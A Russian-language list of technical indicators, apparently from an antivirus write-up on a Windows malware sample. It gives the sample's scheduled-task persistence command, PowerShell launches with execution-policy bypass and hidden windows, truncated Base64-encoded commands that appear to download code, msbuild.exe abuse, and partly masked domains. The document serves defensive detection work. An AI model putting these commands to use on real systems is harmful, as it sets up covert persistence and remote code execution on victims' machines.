Техническая информация
- <SYSTEM32>\tasks\systemle
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe
- http://pa##e.ee/r/CRDse
- DNS ASK pa##e.ee
- DNS ASK pa###code.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /nOp -eP ByPass -win 1 -noNinteRacTi -nolOgO %TEMP%\test.ps1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /nOp -eP ByPass -win 1 -noNinteRacTi -nolOgO %TEMP%\test.ps1' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmAC...
- '%WINDIR%\syswow64\schtasks.exe' /create /sc minute /mo 1 /tn SystemLE /tr "powershell /nOp -eP ByPass -win 1 -noNinteRacTi -nolOgO %TEMP%\test.ps1"
- '<SYSTEM32>\taskeng.exe' {AAAF5C67-F706-4163-8F42-AAC42CC6A315} S-1-5-21-1960123792-2022915161-3775307078-1001:vnulzplm\user:Interactive:[1]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -eP BYPasS /nOp -win 1 -noNinteRacTi -nolOgO /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAK...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'